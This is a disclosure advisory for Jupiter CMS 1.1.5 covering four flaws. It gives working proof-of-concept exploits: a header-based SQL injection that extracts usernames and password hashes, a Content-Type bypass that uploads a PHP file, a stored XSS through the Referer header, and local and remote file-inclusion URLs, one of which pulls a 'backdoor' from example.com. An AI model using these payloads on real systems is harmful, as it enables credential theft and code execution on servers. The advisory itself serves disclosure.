Title: Jupiter CMS 1.1.5 Multiple Vulnerabilities
Advisory ID: 12070214
Risk level: High
Author: DarkFig <gmdarkfig@gmail.com>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
.: [ OVERVIEW ]
Jupiter CMS 1.1.5 is a powerful user-friendly Community Management System.
Advanced boxes/block system, members management, high-end forums, topics,
statistics, emoticons/logs management. A new version is actually in coding,
however the latest stable version is 1.1.5.
I decided to download it because a friend tell me that he was going to use
it for his website and he asked me if I could audit it. The first thing I
realised is that they directly used the $_SERVER array (without protection
against SQL Injection attacks) in several SQL request. The second vulnerability
i found, is that the script do not check for file extensions when a user upload
an emoticon, and the access protection of the "modules" directory files can be
bypassed. There is also a remote/local file inclusion with the "n" parameter,
and a permanent XSS.
.: [ VULN #1 ]
Risk level: Medium
Summary: find_ip() SQL Injection
Conditions: None
The script "includes/functions.php" contains the following functions:
function find_ip() {
if (getenv('HTTP_CLIENT_IP')) $ip = getenv('HTTP_CLIENT_IP');
elseif (getenv('HTTP_X_FORWARDED_FOR')) $ip = getenv('HTTP_X_FORWARDED_FOR');
elseif (getenv('HTTP_X_FORWARDED')) $ip = getenv('HTTP_X_FORWARDED');
elseif (getenv('HTTP_FORWARDED_FOR')) $ip = getenv('HTTP_FORWARDED_FOR');
elseif (getenv('HTTP_FORWARDED')) $ip = getenv('HTTP_FORWARDED');
else $ip = $_SERVER['REMOTE_ADDR'];
return $ip;
}
This function is called from others PHP scripts in order to determine the IP
of the client. But the majority of headers can be modified by the user. For the
most part of the time, this function is used in SQL requests. For example, the
script "index.php" contains the following SQL request:
$ban_ip_check = $db->getLine("SELECT ip, date FROM bans WHERE ip =
'".find_ip()."'");
if($ban_ip_check != FALSE) {
?>
<link href="templates/<?= $template ?>/extra/jupiter.css" rel="stylesheet"
type="tex
<div id="attentionwrapper">
<table class="main" height="1%" cellspacing="1" cellpadding="4"><col
width="1%"><col
<tr height="1%" class="head"><td class="head" colspan="2"><?= $language['Bans
name']
<tr height="1%"><td class="con1" rowspan="5" valign="top"><img
src="templates/<?= $t
<tr height="1%" class="bottom"><td valign="top"><?= $language['Bans title']
?></td><
<tr height="1%"><td class="con1"><?= $language['Bans desc'] ?> <?=
$ban_ip_check['ip
<tr height="1%" class="bottom"><td valign="top"><?= $language['Bans title2']
?></td>
</table>
</div>
<? exit;
}
magic_quotes_gpc is not applied to $_SERVER array, so this can lead to SQL
Injection attack even if magic_quotes_gpc = On. One result of the SQL request
is returned to the user, so this is a simple SQL Injection (not a blind). This
simple poc illustrate how an attacker can exploit this vulnerability:
# SQL Injection Vulnerability (POC #1)
#
require("phpsploitclass.php"); # See [1]
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$hev = "-1' UNION SELECT CONCAT('"
."[BEGIN_XPL_USER]',"
."(SELECT username FROM users LIMIT 0,1),'"
."[END_XPL_USER]','"
."[BEGIN_XPL_PWD]',"
."(SELECT password FROM users LIMIT 0,1),'"
."[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP",$hev);
$xpl->get($url);
preg_match("#\[BEGIN_XPL_USER\](.*)\[END_XPL_USER\]#",$xpl->getcontent(),$usr);
preg_match("#\[BEGIN_XPL_PWD\]([a-z0-9]{32})\[END_XPL_PWD\]#",$xpl->getcontent(),$pwd);
print $usr[1].'::'.$pwd[1];
#
# EOF POC #1
.: [ VULN #2 ]
Risk level: High
Summary: File Upload Vulnerability
Conditions: register_globals = On
All scripts situated in the "modules" directory can be executed by a guest,
for example let's see "modules/emoticons.php" access protection :
if(isset($is_guest) || isset($is_user))
{ header("location: $PHP_SELF?i=2"); exit; }
An attacker can access to this script, simply by sending a GET request
which contains the "is_guest" and "is_user" variables. For the most part of
the time, this is not critical because the script use several functions
stored in other files (not include), this return a Fatal Error. But if the
"a" parameter is set to 1 the script "modules/emoticons.php" let us upload
a file, before producing a Fatal Error. Let's see the upload protection:
$allowed_types = array('image/gif', 'image/jpeg', 'image/pjpeg', 'image/png',
'image/x-png');
if(!in_array($uploaded_file['type'],$allowed_types)){
header("location: $PHP_SELF?n=modules/emoticons&i=30");exit;
}
So what we have to do to bypass this protection, is just to modify the
"Content-Type" header. This poc illustrate how an attacker can upload a
malicious php file:
# File Upload Vulnerability (POC #2)
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url,
"is_guest" => 1,
"is_user" => 1,
"a" => 1,
"req_file" => array(frmdt_filename => "iamaphpfile.php",
frmdt_type => "image/jpeg",
frmdt_content => "<?php echo(iamontheserver);
?>"));
$xpl->formdata($arr);
$xpl->get($url.'images/emoticons/iamaphpfile.php');
print($xpl->getcontent());
#
# EOF POC #2
.: [ VULN #3 ]
Risk level: Low
Summary: "Logged Guests" XSS
Conditions: None
The script "index.php" insert (in the database) some informations sent by
the web browser.
if(!isset($_SESSION['in_site']))
{
$db->insertRow("online",array('sid' => ''.$session_id.'',
'type' => 'live','status' => 'guest','user' => NULL,'user_id' => NULL,
'user_authorization' => NULL,'user_email' => NULL,'user_hideemail' => NULL,
'user_flag' => NULL,'user_location' => NULL,'ip' => ''.find_ip().'',
'refer' => ''.$_SERVER['HTTP_REFERER'].'','browser' =>
''.find_browser($_SERVER['HTTP_USER_AGENT']).'',
'lang' => ''.$lang.'','date' => ''.time().''));
$db->insertRow("online",array('sid' => ''.$session_id.'','type' => 'log',
'status' => 'guest','user' => NULL,'user_id' => NULL,'user_authorization'
=> NULL,
'user_email' => NULL,'user_hideemail' => NULL,'user_flag' =>
NULL,'user_location' => NULL,
'ip' => ''.find_ip().'','refer' => ''.$_SERVER['HTTP_REFERER'].'',
'browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'','lang' =>
''.$lang.'',
'date' => ''.time().''));
$_SESSION['in_site'] = 1;
}
All data inserted in the database are protected against SQL Injection attacks,
however they're not protected against XSS. This is a permanent XSS, the
malicious
code will be executed when the admin will click on "Logged Guest". Proof of
concept:
# "Logged Guest" XSS Vulnerability (POC #3)
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->addheader("Referer", "<script>alert('XSS VULN')</script>");
$xpl->get($url);
#
# EOF POC #3
.: [ VULN #4 ]
Risk level: High
Summary: Local/Remote File Inclusion
Conditions: LFI: magic_quotes_gpc = Off
RFI: PHP >= 5.0.0, allow_url_fopen = On
The script "index.php" contains the following code:
if(isset($n))
{
if(file_exists("$n.php"))
{
if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
}
elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");
}
The "n" parameter isn't properly filtered, this can lead to file inclusion.
Local file inclusion will work if magic_quotes_gpc=Off, the null byte char \x00
is required. Remote file inclusion will work if the server is running on PHP >=
5.
In this version, the file_exists() function can be used with some URL wrappers,
you can use ftp:// for example. Simple poc:
LFI: http://<host><path>/index.php?n=/etc/passwd%00
RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor
.: [ LINKS ]
[1] PhpSploit Class
http://www.acid-root.new.fr/tools/03061230.txt
[2] FTP/FTPS with PHP
http://www.php.net/manual/en/wrappers.ftp.php
[3] Good paper about File Upload Vulnerability
http://shsc.info/FileUploadSecurity
[4] X-Forwarded-For
http://en.wikipedia.org/wiki/X-Forwarded-For
[5] AcidRoot
http://www.acid-root.new.fr
